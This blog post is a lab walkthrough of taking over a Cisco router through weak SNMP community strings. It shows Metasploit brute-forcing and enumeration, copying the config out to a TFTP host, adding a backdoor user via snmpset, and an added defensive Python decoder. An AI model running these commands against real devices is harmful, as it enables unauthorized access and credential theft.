Breaking In – Fun with SNMP


Well, as luck will have it, I won one of those CCNA CyberOps scholarships and it starts….September…of next year…thanks Cisco! So since I haven’t managed to publish anything in a while, here is an entry I did for Reddit’s CCNA sub.


People have been talking a fair bit because of the whole scholarship thing, but I figured it would be a nice change of pace to play around with a cyber ops topic, exploiting SNMP 🙂

The standard security disclaimer applies here, if you are going to follow along with these types of posts then make sure you are only doing them against your own lab equipment.

Let’s say we want to log onto a router but we seem to have misplaced our pesky username and password. We do know that SNMP is set up on the router and that we haven’t gotten around to securing it yet.

We’ll simply boot up Metasploit in Kali and see what options we have for SNMP.

     ,           ,
    /             \
   ((__---,,,---__))
      (_) O O (_)_________
         \ _ /            |\
          o_o \   M S F   | \
               \   _____  |  *
                |||   WW|||
                |||     |||


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.13.2-dev                          ]
+ -- --=[ 1605 exploits - 913 auxiliary - 275 post        ]
+ -- --=[ 458 payloads - 39 encoders - 9 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > search snmp

Matching Modules
================

   Name                                                 Disclosure Date  Rank       Description
   ----                                                 ---------------  ----       -----------
   auxiliary/admin/cisco/cisco_asa_extrabacon                            normal     Cisco ASA Authentication Bypass (EXTRABACON)
   auxiliary/scanner/misc/oki_scanner                                    normal     OKI Printer Default Login Credential Scanner
   auxiliary/scanner/snmp/aix_version                                    normal     AIX SNMP Scanner Auxiliary Module
   auxiliary/scanner/snmp/arris_dg950                                    normal     Arris DG950A Cable Modem Wifi Enumeration
   auxiliary/scanner/snmp/brocade_enumhash                               normal     Brocade Password Hash Enumeration
   auxiliary/scanner/snmp/cisco_config_tftp                              normal     Cisco IOS SNMP Configuration Grabber (TFTP)
   auxiliary/scanner/snmp/cisco_upload_file                              normal     Cisco IOS SNMP File Upload (TFTP)
   auxiliary/scanner/snmp/netopia_enum                                   normal     Netopia 3347 Cable Modem Wifi Enumeration
   auxiliary/scanner/snmp/sbg6580_enum                                   normal     ARRIS / Motorola SBG6580 Cable Modem SNMP Enumeration Module
   auxiliary/scanner/snmp/snmp_enum                                      normal     SNMP Enumeration Module
   auxiliary/scanner/snmp/snmp_enum_hp_laserjet                          normal     HP LaserJet Printer SNMP Enumeration
   auxiliary/scanner/snmp/snmp_enumshares                                normal     SNMP Windows SMB Share Enumeration
   auxiliary/scanner/snmp/snmp_enumusers                                 normal     SNMP Windows Username Enumeration
   auxiliary/scanner/snmp/snmp_login                                     normal     SNMP Community Login Scanner
   auxiliary/scanner/snmp/snmp_set                                       normal     SNMP Set Module
   auxiliary/scanner/snmp/ubee_ddw3611                                   normal     Ubee DDW3611b Cable Modem Wifi Enumeration
   auxiliary/scanner/snmp/xerox_workcentre_enumusers                     normal     Xerox WorkCentre User Enumeration (SNMP)
   exploit/multi/http/hp_sys_mgmt_exec                  2013-06-11       excellent  HP System Management Homepage JustGetSNMPQueue Command Injection
   exploit/windows/ftp/oracle9i_xdb_ftp_unlock          2003-08-18       great      Oracle 9i XDB FTP UNLOCK Overflow (win32)
   exploit/windows/http/hp_nnm_ovwebsnmpsrv_main        2010-06-16       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe main Buffer Overflow
   exploit/windows/http/hp_nnm_ovwebsnmpsrv_ovutil      2010-06-16       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe ovutil Buffer Overflow
   exploit/windows/http/hp_nnm_ovwebsnmpsrv_uro         2010-06-08       great      HP OpenView Network Node Manager ovwebsnmpsrv.exe Unrecognized Option Buffer Overflow
   exploit/windows/http/hp_nnm_snmp                     2009-12-09       great      HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow
   exploit/windows/http/hp_nnm_snmpviewer_actapp        2010-05-11       great      HP OpenView Network Node Manager snmpviewer.exe Buffer Overflow
   exploit/windows/scada/sunway_force_control_netdbsrv  2011-09-22       great      Sunway Forcecontrol SNMP NetDBServer.exe Opcode 0x57
   post/windows/gather/enum_snmp                                         normal     Windows Gather SNMP Settings Enumeration (Registry)

We’ll use the snmp_login module to sweep our subnet and see if a common SNMP community string is configured on the router.

msf > use auxiliary/scanner/snmp/snmp_login 
msf auxiliary(snmp_login) > show options

Module options (auxiliary/scanner/snmp/snmp_login):

   Name              Current Setting                                                       Required  Description
   ----              ---------------                                                       --------  -----------
   BLANK_PASSWORDS   false                                                                 no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                                                     yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                                                 no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                                                 no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                                                 no        Add all users in the current database to the list
   PASSWORD                                                                                no        The password to test
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt  no        File containing communities, one per line
   RHOSTS                                                                                  yes       The target address range or CIDR identifier
   RPORT             161                                                                   yes       The target port
   STOP_ON_SUCCESS   false                                                                 yes       Stop guessing when a credential works for a host
   THREADS           1                                                                     yes       The number of concurrent threads
   USER_AS_PASS      false                                                                 no        Try the username as the password for all users
   VERBOSE           true                                                                  yes       Whether to print output for all attempts
   VERSION           1                                                                     yes       The SNMP version to scan (Accepted: 1, 2c, all)

msf auxiliary(snmp_login) > set RHOST 10.10.13.1-10.10.13.254
RHOST => 10.10.13.1-10.10.13.254
msf auxiliary(snmp_login) > set THREADS 10
THREADS => 10
msf auxiliary(snmp_login) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
msf auxiliary(snmp_login) > set RHOSTS 10.10.13.1-10.10.13.254
RHOSTS => 10.10.13.1-10.10.13.254
msf auxiliary(snmp_login) > run

[*] Scanned  27 of 254 hosts (10% complete)
[*] Scanned  51 of 254 hosts (20% complete)
[*] Scanned  77 of 254 hosts (30% complete)
[*] Scanned 103 of 254 hosts (40% complete)
[*] Scanned 127 of 254 hosts (50% complete)
[*] Scanned 153 of 254 hosts (60% complete)
[+] 10.10.13.160:161 - LOGIN SUCCESSFUL: private (Access level: read-write); Proof (sysDescr.0): Cisco IOS Software, C5921 Software (C5921_I86-UNIVERSALK9-M), Version 15.5(2)T, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 25-Mar-15 15:49 by prod_rel_team
[+] 10.10.13.160:161 - LOGIN SUCCESSFUL: public (Access level: read-only); Proof (sysDescr.0): Cisco IOS Software, C5921 Software (C5921_I86-UNIVERSALK9-M), Version 15.5(2)T, RELEASE SOFTWARE (fc1)
Technical Support: http://www.cisco.com/techsupport
Copyright (c) 1986-2015 by Cisco Systems, Inc.
Compiled Wed 25-Mar-15 15:49 by prod_rel_team
[*] Scanned 178 of 254 hosts (70% complete)
[*] Scanned 204 of 254 hosts (80% complete)
[*] Scanned 229 of 254 hosts (90% complete)
[*] Scanned 254 of 254 hosts (100% complete)
[*] Auxiliary module execution completed

Looks like our router is using public for read-only and private for read-write!

If we need a reminder of what is set up on the router, we can use the enumeration module.

msf > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(snmp_enum) > show options

Module options (auxiliary/scanner/snmp/snmp_enum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      161              yes       The target port
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>

msf auxiliary(snmp_enum) > set COMMUNITY private
COMMUNITY => private
msf auxiliary(snmp_enum) > set RHOSTS 10.10.13.160
RHOSTS => 10.10.13.160
msf auxiliary(snmp_enum) > run

[+] 10.10.13.160, Connected.

[*] System information:

Host IP                       : 10.10.13.160
Hostname                      : Hub-RTR01.testlab.com
Description                   : Cisco IOS Software, C5921 Software (C5921_I86-UNIVERSALK9-M), Version 15.5(2)T, RELEASE SOFTWARE (fc1)  Technical Support: http://www.cisco.com/techsupport  Copyright (c) 1986-2015 by Cisco Systems, Inc.  Compiled Wed 25-Mar-15 15:49 by prod_rel_team
Contact                       : -
Location                      : -
Uptime snmp                   : -
Uptime system                 : 25 days, 01:56:55.86
System date                   : -

[*] Network information:

IP forwarding enabled         : yes
Default TTL                   : 255
TCP segments received         : 20033
TCP segments sent             : 11831
TCP segments retrans          : 58
Input datagrams               : 8124605
Delivered datagrams           : 5076717
Output datagrams              : 3394103

[*] Network interfaces:

Interface                     : [ up ] Ethernet0/0
Id                            : 1
Mac Address                   : 00:50:56:9e:7e:bb
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 4012233263
Out octets                    : 657677202

Interface                     : [ up ] Ethernet0/1
Id                            : 2
Mac Address                   : 00:50:56:9e:02:74
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 402191186
Out octets                    : 201354514

Interface                     : [ up ] Ethernet0/2
Id                            : 3
Mac Address                   : 00:50:56:9e:66:a1
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 553699138
Out octets                    : 431806330

Interface                     : [ up ] Ethernet0/3
Id                            : 4
Mac Address                   : 00:50:56:9e:22:dc
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 155121906
Out octets                    : 72129208

Interface                     : [ up ] Ethernet1/0
Id                            : 5
Mac Address                   : 00:50:56:9e:01:7d
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 16356648
Out octets                    : 1864788211

Interface                     : [ down ] Ethernet1/1
Id                            : 6
Mac Address                   : 00:50:56:9e:7e:74
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] Ethernet1/2
Id                            : 7
Mac Address                   : 00:50:56:9e:20:ba
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ down ] Ethernet1/3
Id                            : 8
Mac Address                   : 00:50:56:9e:16:dd
Type                          : ethernet-csmacd
Speed                         : 1000 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ up ] VoIP-Null0
Id                            : 9
Mac Address                   : :::::
Type                          : other
Speed                         : 4294 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ up ] Null0
Id                            : 10
Mac Address                   : :::::
Type                          : other
Speed                         : 4294 Mbps
MTU                           : 1500
In octets                     : 0
Out octets                    : 0

Interface                     : [ up ] Loopback0
Id                            : 11
Mac Address                   : :::::
Type                          : softwareLoopback
Speed                         : 4294 Mbps
MTU                           : 1514
In octets                     : 0
Out octets                    : 8568300

Interface                     : [ up ] Tunnel0
Id                            : 12
Mac Address                   : :::::
Type                          : unknown
Speed                         : 0 Mbps
MTU                           : 17912
In octets                     : 0
Out octets                    : 2132851

Interface                     : [ up ] Tunnel1
Id                            : 13
Mac Address                   : :::::
Type                          : unknown
Speed                         : 0 Mbps
MTU                           : 17920
In octets                     : 0
Out octets                    : 0


[*] Network IP:

Id                  IP Address          Netmask             Broadcast           
5                   10.1.2.2            255.255.255.0       1                   
4                   10.1.103.1          255.255.255.0       1                   
2                   10.10.12.1          255.255.255.0       1                   
1                   10.10.13.160        255.255.255.0       1                   
3                   10.10.14.1          255.255.255.0       1                   
11                  10.10.255.254       255.255.255.255     1                   

[*] TCP connections and listening ports:

Local address       Local port          Remote address      Remote port         State               
10.10.13.160        22                  10.10.13.13         16761               established         

[*] Listening UDP ports:

Local address       Local port          
10.10.13.160        67                  
10.10.13.160        161                 
10.10.13.160        162                 
10.10.13.160        18999               
10.10.13.160        53157               
224.0.1.40          496                 


[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(snmp_enum) > back

Next we’ll download the running configuration from the router so we can add our user account, using the fancy TFTP module. Metasploit isn’t really doing anything fancy here aside from the SNMP sweep; it is just grouping together a few SNMP requests for us.

msf > use auxiliary/scanner/snmp/cisco_config_tftp
msf auxiliary(cisco_config_tftp) > show options

Module options (auxiliary/scanner/snmp/cisco_config_tftp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  public           yes       SNMP Community String
   LHOST                       no        The IP address of the system running this module
   OUTPUTDIR                   no        The directory where we should save the configuration files (disabled by default)
   RETRIES    1                yes       SNMP Retries
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      161              yes       The target port
   SOURCE     4                yes       Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>

msf auxiliary(cisco_config_tftp) > set COMMUNITY private
COMMUNITY => private
msf auxiliary(cisco_config_tftp) > set LHOST 10.10.13.114
LHOST => 10.10.13.114
msf auxiliary(cisco_config_tftp) > set RHOST 10.10.13.160
RHOST => 10.10.13.160
msf auxiliary(cisco_config_tftp) > run
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: RHOSTS.
msf auxiliary(cisco_config_tftp) > set RHOSTS 10.10.13.160
RHOSTS => 10.10.13.160
msf auxiliary(cisco_config_tftp) > run

[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 10.10.13.160...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 10.10.13.160 - 10.10.13.160.txt 4945 bytes
[+] 10.10.13.160:161 MD5 Encrypted Enable Password: $1$c7e4$q9aUD24ObbOxNsyEHZTHp1
[+] 10.10.13.160:161 Username 'admin' with MD5 Encrypted Password: $1$BhP8$RRafvJYVHZancM6sDF5vh0
[+] 10.10.13.160:161 SNMP Community (RO): public
[+] 10.10.13.160:161 SNMP Community (RW): private
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed
msf auxiliary(cisco_config_tftp) > 
msf auxiliary(cisco_config_tftp) > 
msf auxiliary(cisco_config_tftp) > back
msf > use auxiliary/scanner/snmp/cisco_config_tftp
msf auxiliary(cisco_config_tftp) > show options

Module options (auxiliary/scanner/snmp/cisco_config_tftp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   COMMUNITY  private          yes       SNMP Community String
   LHOST      10.10.13.114     no        The IP address of the system running this module
   OUTPUTDIR                   no        The directory where we should save the configuration files (disabled by default)
   RETRIES    1                yes       SNMP Retries
   RHOSTS     10.10.13.160     yes       The target address range or CIDR identifier
   RPORT      161              yes       The target port
   SOURCE     4                yes       Grab the startup (3) or running (4) configuration (Accepted: 3, 4)
   THREADS    1                yes       The number of concurrent threads
   TIMEOUT    1                yes       SNMP Timeout
   VERSION    1                yes       SNMP Version <1/2c>

msf auxiliary(cisco_config_tftp) > set LHOST 10.10.13.114
LHOST => 10.10.13.114
msf auxiliary(cisco_config_tftp) > set RHOSTS 10.10.13.160
RHOSTS => 10.10.13.160
msf auxiliary(cisco_config_tftp) > set COMMUNITY private
COMMUNITY => private
msf auxiliary(cisco_config_tftp) > set OUTDIR /var/tmp/
OUTDIR => /var/tmp/
msf auxiliary(cisco_config_tftp) > set OUTPUTDIR /var/tmp/
OUTPUTDIR => /var/tmp/
msf auxiliary(cisco_config_tftp) > run

[*] Starting TFTP server...
[*] Scanning for vulnerable targets...
[*] Trying to acquire configuration from 10.10.13.160...
[*] Scanned 1 of 1 hosts (100% complete)
[*] Providing some time for transfers to complete...
[*] Incoming file from 10.10.13.160 - 10.10.13.160.txt 4945 bytes
[*] Saved configuration file to /var/tmp/10.10.13.160.txt
[+] 10.10.13.160:161 MD5 Encrypted Enable Password: $1$c7e4$q9aUD24ObbOxNsyEHZTHp1
[+] 10.10.13.160:161 Username 'admin' with MD5 Encrypted Password: $1$BhP8$RRafvJYVHZancM6sDF5vh0
[+] 10.10.13.160:161 SNMP Community (RO): public
[+] 10.10.13.160:161 SNMP Community (RW): private
[*] Shutting down the TFTP service...
[*] Auxiliary module execution completed

At this point we have the running config downloaded to /var/tmp/.txt, so let’s add our username to the file. I’ll use AWK, but using a text editor is perfectly fine if a bit boring. Because we are doing a merge with the running config we don’t actually need to upload the entire config file; we could have also just uploaded the exact commands we wanted.

root@kail01:~# gawk -i inplace '/username/{print "username meowcat password meowmeow"}1' /var/tmp/10.10.13.160.txt && cat /var/tmp/10.10.13.160.txt | grep username
username meowcat password meowmeow
username admin secret 5 $1$BhP8$RRafvJYVHZancM6sDF5vh0

Lastly we will use SNMP set to upload the file into the running configuration. I won’t go into detail since this is mostly just a primer, but basically each line pushes one part of the `copy tftp://10.10.13.114/cisco.txt running’ command to the router. Note I renamed the text file to cisco.txt for clarity.

snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 1
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 4
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a 10.10.13.114
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s cisco.txt
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1
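To make the six snmpset lines above readable from the defender's side, here is an added example (not part of the original post, and not Metasploit's code) that decodes the OIDs they write: they are columns of the ccCopyEntry table in CISCO-CONFIG-COPY-MIB (1.3.6.1.4.1.9.9.96.1.1.1.1), and the same table is what the cisco_config_tftp module drove earlier to pull the config out. The script parses snmpset-style lines (or the equivalent varbinds from a capture), renders the requested copy operation, and flags config writes into, or copies out of, the device; the sample input is the post's own sequence, constructed inline, and the column and enumeration names are taken from the MIB.

```python
# Added example: decode CISCO-CONFIG-COPY-MIB ccCopyEntry writes seen in an
# snmpset transcript (or a decoded SNMP SET PDU) and flag risky operations.
import re

CC_COPY_ENTRY = "1.3.6.1.4.1.9.9.96.1.1.1.1"   # ccCopyEntry OID prefix

# Column numbers and enumerated values as defined in CISCO-CONFIG-COPY-MIB.
COLUMNS = {2: "ccCopyProtocol", 3: "ccCopySourceFileType",
           4: "ccCopyDestFileType", 5: "ccCopyServerAddress",
           6: "ccCopyFileName", 14: "ccCopyEntryRowStatus"}
PROTOCOLS = {1: "tftp", 2: "ftp", 3: "rcp", 4: "scp", 5: "sftp"}
FILE_TYPES = {1: "networkFile", 2: "iosFile", 3: "startupConfig",
              4: "runningConfig", 5: "terminal"}
ROW_STATUS = {1: "active", 4: "createAndGo", 5: "createAndWait", 6: "destroy"}

# Matches "snmpset -c <community> -v <ver> <host> <oid> <type> <value>".
SNMPSET_RE = re.compile(
    r"snmpset\s+-c\s+(?P<community>\S+)\s+-v\s+\S+\s+(?P<host>\S+)\s+"
    r"(?P<oid>[\d.]+)\s+(?P<type>[ias])\s+(?P<value>\S+)")


def parse_snmpset_lines(lines):
    """Group ccCopyEntry writes by row index -> {column number: value}."""
    rows = {}
    for line in lines:
        m = SNMPSET_RE.search(line)
        if not m or not m.group("oid").startswith(CC_COPY_ENTRY + "."):
            continue  # not a config-copy write; ignore
        column, index = m.group("oid")[len(CC_COPY_ENTRY) + 1:].split(".")
        value = m.group("value")
        if m.group("type") == "i":          # INTEGER varbind
            value = int(value)
        rows.setdefault(int(index), {})[int(column)] = value
    return rows


def describe_copy(row):
    """Render one ccCopyEntry row as readable text plus a list of risk flags."""
    proto = PROTOCOLS.get(row.get(2), "unknown")
    src = FILE_TYPES.get(row.get(3), "unknown")
    dst = FILE_TYPES.get(row.get(4), "unknown")
    status = ROW_STATUS.get(row.get(14), "unknown")
    summary = (f"{proto} copy {src} -> {dst}, server={row.get(5, '-')}, "
               f"file={row.get(6, '-')}, rowStatus={status}")
    flags = []
    if src == "networkFile" and dst in ("runningConfig", "startupConfig"):
        flags.append("CONFIG_WRITE_FROM_NETWORK")   # what the post does
    if src in ("runningConfig", "startupConfig") and dst == "networkFile":
        flags.append("CONFIG_EXFIL_TO_NETWORK")     # what cisco_config_tftp does
    if status in ("active", "createAndGo"):
        flags.append("COPY_TRIGGERED")              # row activation starts the copy
    return summary, flags


# Constructed sample input: the snmpset sequence shown in the post.
SAMPLE = """
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 i 1
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 i 1
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 i 4
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 a 10.10.13.114
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 s cisco.txt
snmpset -c private -v 2c 10.10.13.160 1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 i 1
""".strip().splitlines()

if __name__ == "__main__":
    for index, row in parse_snmpset_lines(SAMPLE).items():
        summary, flags = describe_copy(row)
        print(f"row {index}: {summary}  flags={flags}")
```

Any SET against this table from an address that is not your management station is worth an alert on its own; a write-enabled community string is all it takes.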

And now we can SSH in with our new account.

tpt@HOME01:/mnt/c$ ssh meowcat@10.10.13.160
The authenticity of host '10.10.13.160 (10.10.13.160)' can't be established.
RSA key fingerprint is d4:22:5f:6f:0b:cd:24:0c:fd:9b:22:7c:82:7e:c6:a0.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '10.10.13.160' (RSA) to the list of known hosts.
Password:

Hub-RTR02>

This is why we lock down SNMP as much as possible 🙂

Beyond security, you might find yourself using a similar method (without Metasploit) to do things like get around locking yourself out of a router or clearing lines when all your VTYs are used up. Now that Windows supports bash it is also really easy to use SNMP tools while connected to various VPNs.

Hooray for SNMP!
